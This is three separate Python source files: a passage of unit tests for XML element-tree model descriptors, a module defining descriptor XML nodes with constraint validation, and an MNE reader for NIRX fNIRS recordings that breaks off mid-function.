root.find('tag1/tag2/tag3').shouldnt_be_none() def test_make_path_with_attribs(self): root = etree.Element('root') res = mp.make_path('tag1/tag2/tag3[@name="val"]', root) res.shouldnt_be_none() res.tag.should_be('tag3') res.get('name').should_be('val') root.find('tag1/tag2/tag3').shouldnt_be_none() def test_make_path_to_parent_some_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') root.append(t1) res = mp.make_path('tag1/tag2/tag3', root, to_parent=True) res.tag.should_be('tag2') t1.find('tag2').shouldnt_be_none() def test_make_path_to_parent_all_exists(self): root = etree.Element('root') t1 = etree.Element('tag1') t2 = etree.Element('tag2') root.append(t1) t1.append(t2) res = mp.make_path('tag1/tag2/tag3', root, to_parent=True) res.tag.should_be('tag2') t1.find('tag2').shouldnt_be_none() class _TestDescBase(object): def make_present(self): self.model._etree.append(self.elem) def test_get_exists(self): self.make_present() self.desc.__get__(self.model).should_be(self.target_value) def test_get_not_exists(self): self.desc.__get__(self.model).should_be_none() def test_del_exists(self): self.make_present() self.desc.__delete__(self.model) def test_del_not_exists(self): self.desc.__delete__.should_raise(AttributeError, self.model) def test_set_exists(self): self.make_present() self.desc.__get__(self.model).should_be(self.target_value) self.desc.__set__(self.model, self.alternate_value) self.desc.__get__(self.model).should_be(self.alternate_value) def test_set_not_exists(self): self.desc.__set__(self.model, self.alternate_value) self.desc.__get__(self.model).should_be(self.alternate_value) class TestCustomNodeValue(_TestDescBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.elem = etree.Element('name', lang='english') self.target_value = 'some name' self.alternate_value = 'some other name' self.elem.text = self.target_value self.desc = mp.CustomNodeValue('name[@lang="english"]', xh.load_text, xh.dump_text) def test_loads(self): self.model._etree.append(self.elem) self.desc._loads = lambda e: str(e.text) + '-hi' self.desc.__get__(self.model).should_be(self.target_value + '-hi') def test_dumps(self): def set_text(v, e): e.text = v[:-3] return e self.desc._dumps = set_text self.desc.__set__(self.model, self.target_value + '-hi') elem = self.model._etree.find('name') elem.shouldnt_be_none() elem.text.should_be(self.target_value) def test_set_invalidates_cache(self): self.model._cache = True self.desc._cached_vals[self.model] = 'cheese' self.desc.__set__(self.model, 'crackers') self.desc.__get__(self.model).should_be('crackers') self.desc._cached_vals[self.model].should_be('crackers') def test_get_cache_disabled(self): self.model._cache = False self.desc.__set__(self.model, 'cheese') self.desc.__get__(self.model).should_be('cheese') self.model._etree.find('name').text = 'crackers' self.desc.__get__(self.model).should_be('crackers') def test_get_cache_enabled(self): self.model._cache = True self.desc._cached_vals[self.model] = 'cheese' self.desc.__get__(self.model).should_be('cheese') class TestNodeValue(TestCustomNodeValue): def setUp(self): self.model = SampleModel() self.elem = etree.Element('name') self.target_value = 'some value' self.alternate_value = 'some other value' self.elem.text = self.target_value self.desc = mp.NodeValue('name') def test_loads(self): self.model._etree.append(self.elem) self.desc._raw_loads = lambda v: str(v) + '-hi' self.desc.__get__(self.model).should_be(self.target_value + '-hi') def test_dumps(self): self.desc._dumps = lambda v: v[:-3] self.desc.__set__(self.model, self.target_value + '-hi') elem = self.model._etree.find('name') elem.shouldnt_be_none() elem.text.should_be(self.target_value) class TestAttributeValue(_TestDescBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.elem = etree.Element('cheese') self.target_value = 'cheddar' self.alternate_value = 'swiss' self.elem.set('type', 'cheddar') self.desc = mp.AttributeValue('cheese', 'type') class TestNodeModelValue(_TestDescBase, unittest.TestCase): def setUp(self): class OtherModel(mp.Model): ROOT_ELEM = 'food' crackers = mp.NodeValue('crackers') self.model = SampleModel() self.target_value = OtherModel() self.target_value.crackers = 'ritz' self.alternate_value = OtherModel() self.alternate_value.crackers = 'whole-grain' self.desc = mp.ModelNodeValue('food', OtherModel, always_present=False) self.elem = self.target_value._etree def test_always_present(self): self.desc._always_present = True self.desc.__get__(self.model).shouldnt_be_none() class _TestNodeValueListViewBase(_TestDescBase): @property def init_desc(self): return self.desc.__get__(self.model) def make_item_present(self, content='', ind=1): item_elem = etree.Element(self.item_elem_name, name=content) self.elem.insert(ind, item_elem) def test_get_item_exists(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.init_desc[0].shouldnt_be_none() self.init_desc[0].should_be(self.alternate_value[0]) def test_get_item_not_exists(self): self.make_present() self.init_desc.__getitem__.should_raise(IndexError, 0) def test_set_item_exists(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.init_desc[0] = self.alternate_value[2] self.model._etree.findall(self.item_path).should_have_length(1) self.model._etree.find(self.item_path).get('name').should_be( self.alternate_value[2]) def test_set_item_not_exists(self): self.make_present() self.init_desc[0] = self.alternate_value[2] self.model._etree.findall(self.item_path).should_have_length(1) self.model._etree.find(self.item_path).get('name').should_be( self.alternate_value[2]) def test_del_item_exists(self): self.make_present() self.make_item_present(self.alternate_value[0]) del self.init_desc[0] self.model._etree.find(self.item_path).should_be_none() def test_del_item_not_exists(self): self.make_present() self.init_desc.pop.should_raise(IndexError, 0) self.model._etree.find(self.item_path).should_be_none() def test_always_present(self): self.desc._always_present = True self.init_desc.should_be([]) def test_len(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) len(self.desc.__get__(self.model)).should_be(2) class TestNodeValueListView(_TestNodeValueListViewBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.target_value = [] self.alternate_value = ['ritz', 'triscuit', 'wheat thins'] self.desc = mp.NodeValueListView('food', 'cracker', lambda e: e.get('name'), lambda v, e: e.set('name', v)) self.elem = etree.Element('food') self.item_elem_name = 'cracker' self.item_path = 'food/cracker' self.elem.append(etree.Element('cheese', name='cheddar')) self.elem.append(etree.Element('cheese', name='swiss')) def test_partial_set(self): self.make_present() self.make_item_present(self.alternate_value[1]) dumper = lambda v, e: e.set('like', v) other_desc = mp.NodeValueListView('food', 'cracker', lambda e: e.text, full_replace=False, elem_dumps=dumper) other_init_desc = other_desc.__get__(self.model) other_init_desc[0] = 'shredded wheat' self.model._etree.findall(self.item_path).should_have_length(1) elem = self.model._etree.find(self.item_path) elem.get('like').should_be('shredded wheat') elem.get('name').should_be(self.alternate_value[1]) def test_set_leaves_other_elems_behind(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) food_elem = self.model._etree.find('food') len(food_elem).should_be(4) self.desc.__set__(self.model, ['wheat thins']) len(food_elem).should_be(3) food_elem[0].tag.should_be('cheese') food_elem[1].tag.should_be('cheese') food_elem[2].tag.should_be('cracker') food_elem[2].get('name').should_be('wheat thins') def test_delete_leaves_other_elems_behind(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) food_elem = self.model._etree.find('food') len(food_elem).should_be(4) self.desc.__delete__(self.model) len(food_elem).should_be(2) food_elem[0].tag.should_be('cheese') food_elem[1].tag.should_be('cheese') def test_set_item_exists(self): super(TestNodeValueListView, self).test_set_item_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_set_item_not_exists(self): super(TestNodeValueListView, self).test_set_item_not_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_del_item_exists(self): super(TestNodeValueListView, self).test_del_item_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_del_item_not_exists(self): super(TestNodeValueListView, self).test_del_item_not_exists() self.model._etree.findall('food/cheese').shouldnt_be_empty() def test_insert(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1], ind=3) self.init_desc.insert(1, self.alternate_value[2]) self.model._etree.findall(self.item_path).should_have_length(3) list(self.init_desc).should_be([self.alternate_value[0], self.alternate_value[2], self.alternate_value[1]]) elem = self.model._etree.find('food')[3] elem.tag.should_be('cracker') elem.get('name').should_be(self.alternate_value[2]) def test_delete_pred_true_removes_elem(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) self.desc._delete_pred = lambda e: True del self.init_desc[0] len(self.model._etree.findall(self.item_path)).should_be(1) def test_delete_pred_false_keeps_elem(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1]) def del_pred(elem): elem.attrib.pop('name') return False self.desc._delete_pred = del_pred del self.init_desc[0] len(self.model._etree.findall(self.item_path)).should_be(2) self.model._etree.find(self.item_path).get('name', None).should_be_none() class TestNodeValueList(_TestNodeValueListViewBase, unittest.TestCase): def setUp(self): self.model = SampleModel() self.target_value = [] self.alternate_value = ['american', 'pepperjack', 'cheddar'] self.desc = mp.NodeValueList('food', lambda e: e.get('name'), lambda v: etree.Element('cheese', name=v)) self.elem = etree.Element('food') self.item_elem_name = 'cheese' self.item_path = 'food/cheese' def make_present(self): super(TestNodeValueList, self).make_present() def test_delete_removes_node(self): self.make_present() self.model._etree.find('food').shouldnt_be_none() self.desc.__delete__(self.model) self.model._etree.find('food').should_be_none() def test_insert(self): self.make_present() self.make_item_present(self.alternate_value[0]) self.make_item_present(self.alternate_value[1], ind=3) self.init_desc.insert(1, self.alternate_value[2]) self.model._etree.findall(self.item_path).should_have_length(3) list(self.init_desc).should_be([self.alternate_value[0], self.alternate_value[2], self.alternate_value[1]])
#!/usr/bin/python # # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import re from rpath_xmllib import api1 as xmllib from catalogService import descriptor_errors as errors class _NodeDescriptorMixin(object): """ @cvar _nodeDescription: a mapping between node classes and attribute names. If the attribute name is the same as the class' name class variable, it can be passed in as C{None}. @type _nodeDescription: C{list} of (nodeClass, attributeName) tuples """ _nodeDescription = [] @classmethod def _setMapping(cls): if hasattr(cls, '_mapping'): return mapping = cls._mapping = {} for nodeClass, attrName in cls._nodeDescription: # If no attribute name is set, use the class' name if attrName is None: attrName = nodeClass.name mapping[nodeClass] = attrName def __init__(self): self.__class__._setMapping() if not hasattr(self, 'extend'): for nodeClass, attrName in self._mapping.items(): setattr(self, attrName, None) def addChild(self, child): if child.__class__ not in self._mapping: return attrName = self._mapping[child.__class__] if getattr(child.__class__, 'multiple', None): vlist = getattr(self, attrName) if vlist is None: vlist = [] setattr(self, attrName, vlist) vlist.append(child.finalize()) elif hasattr(self, 'extend'): self.extend([child.finalize()]) else: setattr(self, attrName, child.finalize()) def _encodeChild(self, nodeClass, attrName, val): if issubclass(nodeClass, xmllib.IntegerNode): return xmllib.IntegerNode(name = attrName).characters(str(val)) if issubclass(nodeClass, xmllib.StringNode): if not isinstance(val, basestring): val = str(val) return xmllib.StringNode(name = attrName).characters(val) if issubclass(nodeClass, xmllib.BooleanNode): return xmllib.BooleanNode(name = attrName).characters( xmllib.BooleanNode.toString(val)) if issubclass(nodeClass, xmllib.NullNode): return xmllib.NullNode(name = attrName) if hasattr(val, 'getElementTree'): return val return None def _iterChildren(self): if hasattr(self, 'extend'): for y in self.iterChildren(): yield y else: for nodeClass, attrName in self._nodeDescription: if attrName is None: attrName = nodeClass.name val = getattr(self, attrName) if val is None and not issubclass(nodeClass, xmllib.NullNode): # The value was not set continue if getattr(nodeClass, 'multiple', None): if not hasattr(val, 'extend'): val = [ val ] else: val = [ val ] for v in val: node = self._encodeChild(nodeClass, attrName, v) if node is not None: yield node def _getName(self): return self.__class__.name class _ExtendEnabledMixin(object): def extend(self, iterable): self._children.extend(iterable) def __iter__(self): return self.iterChildren() def _getName(self): return self.name def _iterChildren(self): for val in self.iterChildren(): if not isinstance(val, (int, str, unicode, bool)): yield val continue # We need to determine the class type - it should be the same nodeClass, attrName = self._nodeDescription[0] if attrName is None: attrName = nodeClass.name if isinstance(val, int): val = xmllib.IntegerNode(name = attrName).characters( str(val)) elif isinstance(val, (str, unicode)): val = xmllib.StringNode(name = attrName).characters(val) elif isinstance(val, bool): val = xmllib.BooleanNode(name = attrName).characters( xmllib.BooleanNode.toString(val)) yield val class _NoCharDataNode(_NodeDescriptorMixin, xmllib.BaseNode): def __init__(self, attributes = None, nsMap = None, name = None): xmllib.BaseNode.__init__(self, attributes = attributes, nsMap = nsMap, name = name) _NodeDescriptorMixin.__init__(self) def characters(self, ch): pass class _DisplayName(xmllib.StringNode): name = 'displayName' class DescriptionNode(xmllib.BaseNode): name = 'desc' @classmethod def fromData(cls, description, lang = None): if isinstance(description, tuple): description, lang = description elif hasattr(description, 'description'): description, lang = description.description, description.lang attrs = {} if lang is not None: attrs['lang'] = lang dn = cls(attrs, name = cls.name) dn.characters(description) return dn class _Descriptions(_ExtendEnabledMixin, _NoCharDataNode): name = 'descriptions' _nodeDescription = [(DescriptionNode, None)] def getDescriptions(self): return dict((x.getAttribute('lang'), x.getText()) for x in self) class HelpNode(xmllib.BaseNode): name = 'help' multiple = True @classmethod def fromData(cls, href, lang = None): if isinstance(href, tuple): href, lang = href elif hasattr(href, 'href'): href, lang = href.href, href.lang attrs = {'href' : href} if lang is not None: attrs['lang'] = lang dn = cls(attrs, name = cls.name) return dn def _getLang(self): return self.getAttribute('lang') lang = property(_getLang) def _getHref(self): return self.getAttribute('href') def _setHref(self, val): # XXX that's not very polite self._otherAttributes[(None, 'href')] = val href = property(_getHref, _setHref) class _RootElement(xmllib.StringNode): name = "rootElement" class MetadataNode(_NoCharDataNode): name = 'metadata' _nodeDescription = [ (_DisplayName, None), (_RootElement, None), (_Descriptions, None), ] class _NameNode(xmllib.StringNode): name = 'name' class _TypeNode(xmllib.StringNode): name = 'type' class _KeyNode(xmllib.StringNode): name = 'key' class _ValueWithDescriptionNode(_NoCharDataNode): name = 'describedValue' _nodeDescription = [ (_Descriptions, None), (_KeyNode, None), ] class _EnumeratedTypeNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'enumeratedType' _nodeDescription = [ (_ValueWithDescriptionNode, None), ] class _MultipleNode(xmllib.BooleanNode): name = 'multiple' class _DefaultNode(xmllib.StringNode): name = 'default' multiple = True class _MinNode(xmllib.IntegerNode): name = 'min' class _MaxNode(xmllib.IntegerNode): name = 'max' class _RequiredNode(xmllib.BooleanNode): name = 'required' class _AllowFileContent(xmllib.BooleanNode): name = 'allowFileContent' class _PasswordNode(xmllib.BooleanNode): name = 'password' class _HiddenNode(xmllib.BooleanNode): name = 'hidden' class _RangeNode(_NoCharDataNode): name = 'range' _nodeDescription = [ (_MinNode, None), (_MaxNode, None), ] def presentation(self): return dict(constraintName = self.__class__.name, min = self.min, max = self.max) @classmethod def fromData(cls, data): obj = cls(name = cls.name) obj.min = data.get('min') obj.max = data.get('max') return obj class _ItemNode(xmllib.StringNode): name = 'item' class _LegalValuesNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'legalValues' _nodeDescription = [ (_ItemNode, None), ] def presentation(self): return dict(constraintName = self.__class__.name, values = list(self)) @classmethod def fromData(cls, data): obj = cls(name = cls.name) obj.extend([ _ItemNode(name = _ItemNode.name).characters(str(x)) for x in data['values'] ]) return obj class _RegexpNode(xmllib.BaseNode): name = 'regexp' def presentation(self): return dict(constraintName = self.__class__.name, value = self.getText()) @classmethod def fromData(cls, data): return cls(name = cls.name).characters(data['value']) class _LengthNode(xmllib.BaseNode): name = 'length' def presentation(self): return dict(constraintName = self.__class__.name, value = int(self.getText())) @classmethod def fromData(cls, data): return cls(name = cls.name).characters(str(data['value'])) class _ConstraintsNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'constraints' _nodeDescription = [ (_Descriptions, None), (_RangeNode, None), (_LegalValuesNode, None), (_RegexpNode, None), (_LengthNode, None), ] def presentation(self): return [ x.presentation() for x in self if \ not isinstance(x, _Descriptions) ] def getDescriptions(self): res = [x for x in self if isinstance(x, _Descriptions)] if res: return res[0].getDescriptions() return {} @classmethod def fromData(cls, constraints): if not constraints: return None cls._setMapping() # Reverse the mapping rev = dict((y, x) for (x, y) in cls._mapping.items()) node = cls() if isinstance(constraints, dict): # Only one constraint constraints = [ constraints ] for cdict in constraints: constraintName = cdict.get('constraintName') if constraintName not in rev: continue #setattr(node, constraintName, rev[constraintName].fromData(cdict)) node._children.append(rev[constraintName].fromData(cdict)) return node class _FieldNameNode(xmllib.StringNode): name = 'fieldName' class _OperatorNode(xmllib.StringNode): name = 'operator' class _ValueNode(xmllib.StringNode): name = 'value' class _ConditionalNode(_NoCharDataNode): name = 'conditional' _nodeDescription = [ (_FieldNameNode, None), (_OperatorNode, None), (_ValueNode, None), ] @classmethod def fromConditional(cls, conditional): obj = cls(name = cls.name) obj.fieldName = conditional.fieldName obj.operator = conditional.operator obj.value = conditional.value return obj class DataFieldNode(_NoCharDataNode): name = 'field' _nodeDescription = [ (_NameNode, None), (_Descriptions, None), (HelpNode, None), (_TypeNode, None), (_EnumeratedTypeNode, None), (_MultipleNode, None), (_DefaultNode, None), (_ConstraintsNode, None), (_RequiredNode, None), (_AllowFileContent, None), (_HiddenNode, None), (_PasswordNode, None), (_ConditionalNode, None), ] class _DataFieldsNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'dataFields' _nodeDescription = [ (DataFieldNode, None) ] class DescriptorNode(_NoCharDataNode): name = 'descriptor' _nodeDescription = [ (MetadataNode, 'metadata'), (_DataFieldsNode, 'dataFields'), ] class DescriptorDataNode(xmllib.BaseNode): name = 'descriptorData' class _DescriptorDataField(object): __slots__ = [ '_node', '_nodeDescriptor' ] def __init__(self, node, nodeDescriptor, checkConstraints = True): self._node = node self._nodeDescriptor = nodeDescriptor if checkConstraints: self.checkConstraints() def checkConstraints(self): errorList = [] if self._nodeDescriptor.multiple: # Get the node's children as values values = [ x.getText() for x in self._node.iterChildren() if hasattr(x, 'getName') and x.getName() == 'item' ] if self._nodeDescriptor.required and not values: errorList.append("Missing field: '%s'" % self._nodeDescriptor.name) elif isinstance(self._nodeDescriptor.type, list): errorList.extend(_validateEnumeratedValue(values, self._nodeDescriptor.type, self._nodeDescriptor.descriptions[None])) else: # It is conceivable that one has a multi-valued field with a # simple type errorList.extend(_validateMultiValue(values, self._nodeDescriptor.type, self._nodeDescriptor.descriptions.get(None), self._nodeDescriptor.constraints)) else: value = self._node.getText() errorList.extend(_validateSingleValue(value, self._nodeDescriptor.type, self._nodeDescriptor.descriptions.get(None), self._nodeDescriptor.constraints)) if errorList: raise errors.ConstraintsValidationError(errorList) def getName(self): return self._node.getName() def getValue(self): vtype = self._nodeDescriptor.type if self._nodeDescriptor.multiple: return [ _cast(x.getText(), vtype) for x in self._node.iterChildren() if x.getName() == 'item' ] return _cast(self._node.getText(), vtype) def getElementTree(self, parent = None): return self._node.getElementTree(parent = parent) def _toStr(val): if isinstance(val, (str, unicode)): return val return str(val) def _cast(val, typeStr): if typeStr == 'int': try: return int(val) except ValueError: raise errors.DataValidationError(val) elif typeStr == 'bool': val = _toStr(val) if val.upper() not in ('TRUE', '1', 'FALSE', '0'): raise errors.DataValidationError(val) return val.upper() in ('TRUE', '1') elif typeStr == 'str': if isinstance(val, unicode): return val try: return str(val).decode('utf-8') except UnicodeDecodeError, e_value: raise errors.DataValidationError('UnicodeDecodeError: %s' % str(e_value)) return val def _validateEnumeratedValue(values, valueType, description): assert(isinstance(valueType, list)) valuesHash = dict((x.key, None) for x in valueType) errorList = [] for value in values: if value in valuesHash: continue errorList.append("'%s': invalid value '%s'" % ( description, value)) return errorList def _validateMultiValue(values, valueType, description, constraints): errorList = [] for value in values: errorList.extend(_validateSingleValue(value, valueType, description, constraints)) return errorList def _validateSingleValue(value, valueType, description, constraints): if isinstance(valueType, list): return _validateEnumeratedValue([value], valueType, description) errorList = [] try: cvalue = _cast(value, valueType) except errors.DataValidationError, e: errorList.append("'%s': invalid value '%s' for type '%s'" % ( description, value, valueType)) return errorList for constraint in constraints: if constraint['constraintName'] == 'legalValues': legalValues = [ _cast(v, valueType) for v in constraint['values'] ] if cvalue not in legalValues: errorList.append("'%s': '%s' is not a legal value" % (description, value)) continue if constraint['constraintName'] == 'range': # Only applies to int if valueType != 'int': continue if 'min' in constraint: minVal = _cast(constraint['min'], valueType) if cvalue < minVal: errorList.append( "'%s': '%s' fails minimum range check '%s'" % (description, value, minVal)) if 'max' in constraint: maxVal = _cast(constraint['max'], valueType) if cvalue > maxVal: errorList.append( "'%s': '%s' fails maximum range check '%s'" % (description, value, maxVal)) continue if constraint['constraintName'] == 'length': # Only applies to str if valueType != 'str': continue if len(cvalue) > int(constraint['value']): errorList.append( "'%s': '%s' fails length check '%s'" % (description, value, constraint['value'])) continue if constraint['constraintName'] == 'regexp': # Only applies to str if valueType != 'str': continue if not re.compile(constraint['value'], re.S).match(cvalue): errorList.append( "'%s': '%s' fails regexp check '%s'" % (description, value, constraint['value'])) continue return errorList
# Authors: Robert Luke <mail@robertluke.net> # # License: BSD (3-clause) from configparser import ConfigParser, RawConfigParser import glob as glob import re as re import os.path as op import numpy as np from ..base import BaseRaw from ..constants import FIFF from ..meas_info import create_info, _format_dig_points from ...annotations import Annotations from ...transforms import apply_trans, _get_trans from ...utils import logger, verbose, fill_doc from ...utils import warn @fill_doc def read_raw_nirx(fname, preload=False, verbose=None): """Reader for a NIRX fNIRS recording. This function has only been tested with NIRScout devices. Parameters ---------- fname : str Path to the NIRX data folder or header file. %(preload)s %(verbose)s Returns ------- raw : instance of RawNIRX A Raw object containing NIRX data. See Also -------- mne.io.Raw : Documentation of attribute and methods. """ return RawNIRX(fname, preload, verbose) def _open(fname): return open(fname, 'r', encoding='latin-1') @fill_doc class RawNIRX(BaseRaw): """Raw object from a NIRX fNIRS file. Parameters ---------- fname : str Path to the NIRX data folder or header file. %(preload)s %(verbose)s See Also -------- mne.io.Raw : Documentation of attribute and methods. """ @verbose def __init__(self, fname, preload=False, verbose=None): from ...externals.pymatreader import read_mat from ...coreg import get_mni_fiducials # avoid circular import prob logger.info('Loading %s' % fname) if fname.endswith('.hdr'): fname = op.dirname(op.abspath(fname)) if not op.isdir(fname): raise FileNotFoundError('The path you specified does not exist.') # Check if required files exist and store names for later use files = dict() keys = ('hdr', 'inf', 'set', 'tpl', 'wl1', 'wl2', 'config.txt', 'probeInfo.mat') for key in keys: files[key] = glob.glob('%s/*%s' % (fname, key)) if len(files[key]) != 1: raise RuntimeError('Expect one %s file, got %d' % (key, len(files[key]),)) files[key] = files[key][0] if len(glob.glob('%s/*%s' % (fname, 'dat'))) != 1: warn("A single dat file was expected in the specified path, but " "got %d. This may indicate that the file structure has been " "modified since the measurement was saved." % (len(glob.glob('%s/*%s' % (fname, 'dat'))))) # Read number of rows/samples of wavelength data last_sample = -1 with _open(files['wl1']) as fid: for line in fid: last_sample += 1 # Read header file # The header file isn't compliant with the configparser. So all the # text between comments must be removed before passing to parser with _open(files['hdr']) as f: hdr_str = f.read() hdr_str = re.sub('#.*?#', '', hdr_str, flags=re.DOTALL) hdr = RawConfigParser() hdr.read_string(hdr_str) # Check that the file format version is supported if hdr['GeneralInfo']['NIRStar'] not in ['"15.0"', '"15.2"', '"15.3"']: raise RuntimeError('MNE does not support this NIRStar version' ' (%s)' % (hdr['GeneralInfo']['NIRStar'],)) if "NIRScout" not in hdr['GeneralInfo']['Device']: warn("Only import of data from NIRScout devices have been " "thoroughly tested. You are using a %s device. " % hdr['GeneralInfo']['Device']) # Parse required header fields # Extract frequencies of light used by machine fnirs_wavelengths = [int(s) for s in re.findall(r'(\d+)', hdr['ImagingParameters']['Wavelengths'])] # Extract source-detectors sources = np.asarray([int(s) for s in re.findall(r'(\d+)-\d+:\d+', hdr['DataStructure']['S-D-Key'])], int) detectors = np.asarray([int(s) for s in re.findall(r'\d+-(\d+):\d+', hdr['DataStructure']['S-D-Key'])], int) # Determine if short channels are present and on which detectors if 'shortbundles' in hdr['ImagingParameters']: short_det = [int(s) for s in re.findall(r'(\d+)', hdr['ImagingParameters']['ShortDetIndex'])] short_det = np.array(short_det, int) else: short_det = [] # Extract sampling rate samplingrate = float(hdr['ImagingParameters']['SamplingRate']) # Read participant information file inf = ConfigParser(allow_no_value=True) inf.read(files['inf']) inf = inf._sections['Subject Demographics'] # Store subject information from inf file in mne format # Note: NIRX also records "Study Type", "Experiment History", # "Additional Notes", "Contact Information" and this information # is currently discarded subject_info = {} names = inf['name'].split() if len(names) > 0: subject_info['first_name'] = \ inf['name'].split()[0].replace("\"", "") if len(names) > 1: subject_info['last_name'] = \ inf['name'].split()[-1].replace("\"", "") if len(names) > 2: subject_info['middle_name'] = \ inf['name'].split()[-2].replace("\"", "") # subject_info['birthday'] = inf['age'] # TODO: not formatted properly subject_info['sex'] = inf['gender'].replace("\"", "") # Recode values if subject_info['sex'] in {'M', 'Male', '1'}: subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_MALE elif subject_info['sex'] in {'F', 'Female', '2'}: subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_FEMALE else: subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_UNKNOWN # NIRStar does not record an id, or handedness by default # Read information about probe/montage/optodes # A word on terminology used here: # Sources produce light # Detectors measure light # Sources and detectors are both called optodes # Each source - detector pair produces a channel # Channels are defined as the midpoint between source and detector mat_data = read_mat(files['probeInfo.mat'], uint16_codec=None) requested_channels = mat_data['probeInfo']['probes']['index_c'] src_locs = mat_data['probeInfo']['probes']['coords_s3'] / 100. det_locs = mat_data['probeInfo']['probes']['coords_d3'] / 100. ch_locs = mat_data['probeInfo']['probes']['coords_c3'] / 100. # These are all in MNI coordinates, so let's transform them to # the Neuromag head coordinate frame mri_head_t, _ = _get_trans('fsaverage', 'mri', 'head') src_locs = apply_trans(mri_head_t, src_locs) det_locs = apply_trans(mri_head_t, det_locs) ch_locs = apply_trans(mri_head_t, ch_locs) # Set up digitization dig = get_mni_fiducials('fsaverage', verbose=False) for fid in dig: fid['r'] = apply_trans(mri_head_t, fid['r']) fid['coord_frame'] = FIFF.FIFFV_COORD_HEAD for ii, ch_loc in enumerate(ch_locs, 1): dig.append(dict( kind=FIFF.FIFFV_POINT_EEG, # misnomer but probably okay r=ch_loc, ident=ii, coord_frame=FIFF.FIFFV_COORD_HEAD, )) dig = _format_dig_points(dig) del mri_head_t # Determine requested channel indices # The wl1 and wl2 files include all possible source - detector pairs. # But most of these are not relevant. We want to extract only the # subset requested in the probe file req_ind = np.array([], int) for req_idx in range(requested_channels.shape[0]): sd_idx = np.where((sources == requested_channels[req_idx][0]) & (detectors == requested_channels[req_idx][1])) req_ind = np.concatenate((req_ind, sd_idx[0])) req_ind = req_ind.astype(int) # Generate meaningful channel names def prepend(list, str): str += '{0}' list = [str.format(i) for i in list] return(list) snames = prepend(sources[req_ind], 'S') dnames = prepend(detectors[req_ind], '_D') sdnames = [m + str(n) for m, n in zip(snames, dnames)] sd1 = [s + ' ' + str(fnirs_wavelengths[0]) for s in sdnames] sd2 = [s + ' ' + str(fnirs_wavelengths[1]) for s in sdnames] chnames = [val for pair in zip(sd1, sd2) for val in pair] # Create mne structure info = create_info(chnames, samplingrate, ch_types='fnirs_cw_amplitude') info.update(subject_info=subject_info, dig=dig) # Store channel, source, and detector locations # The channel location is stored in the first 3 entries of loc. # The source location is stored in the second 3 entries of loc. # The detector location is stored in the third 3 entries of loc. # NIRx NIRSite uses MNI coordinates. # Also encode the light frequency in the structure. for ch_idx2 in range(requested_channels.shape[0]): # Find source and store location src = int(requested_channels[ch_idx2, 0]) - 1 info['chs'][ch_idx2 * 2]['loc'][3:6] = src_locs[src, :] info['chs'][ch_idx2 * 2 + 1]['loc'][3:6] = src_locs[src, :] # Find detector and store location det = int(requested_channels[ch_idx2, 1]) - 1 info['chs'][ch_idx2 * 2]['loc'][6:9] = det_locs[det, :] info['chs'][ch_idx2 * 2 + 1]['loc'][6:9] = det_locs[det, :] # Store channel location as midpoint between source and detector. midpoint = (src_locs[src, :] + det_locs[det, :]) / 2 info['chs'][ch_idx2 * 2]['loc'][:3] = midpoint info['chs'][ch_idx2 * 2 + 1]['loc'][:3] = midpoint info['chs'][ch_idx2 * 2]['loc'][9] = fnirs_wavelengths[0] info['chs'][ch_idx2 * 2 + 1]['loc'][9] = fnirs_wavelengths[1] # Extract the start/stop numbers for samples in the CSV. In theory the # sample bounds should just be 10 * the number of channels, but some # files have mixed \n and \n\r endings (!) so we can't rely on it, and # instead make a single pass over the entire file at the beginning so # that we know how to seek and read later. bounds = dict() for key in ('wl1', 'wl2'): offset = 0 bounds[key] = [offset] with open(files[key], 'rb') as fid: for line in fid: offset += len(line) bounds[key].append(offset) assert offset == fid.tell() # Extras required for reading data raw_extras = { 'sd_index': req_ind, 'files': files, 'bounds': bounds, } super(RawNIRX, self).__init__( info, preload, filenames=[fname], last_samps=[last_sample], raw_extras=[raw_extras], verbose=verbose) # Read triggers from event file if op.isfile(files['hdr'][:-3] + 'evt'): with _open(files['hdr'][:-3] + 'evt') as fid: t = [re.findall(r'(\d+)', line) for line in fid] onset = np.zeros(len(t), float) duration = np.zeros(len(t), float) description = [''] * len(t) for t_idx in range(len(t)): binary_value = ''.join(t[t_idx][1:])[::-1] trigger_frame = float(t[t_idx][0]) onset[t_idx] = (trigger_frame) * (1.0 / samplingrate) duration[t_idx] = 1.0 # No duration info stored in files description[t_idx] = int(binary_value, 2) * 1. annot = Annotations(onset, duration, description) self.set_annotations(annot) def _read_segment_file(self, data, idx, fi, start, stop, cals, mult): """Read a segment of data from a file. The NIRX machine records raw data as two different wavelengths. The returned data interleaves the wavelengths. """ sdindex = self._raw_extras[fi]['sd_index'] wls = [ _read_csv_rows_cols( self._raw_extras[fi]['files'][key], start, stop, sdindex, self._raw_extras[fi]['bounds'][key]).T for key in ('wl1', 'wl2') ] # TODO: Make this more efficient by only indexing above what we need. # For now let's just construct the full data matrix 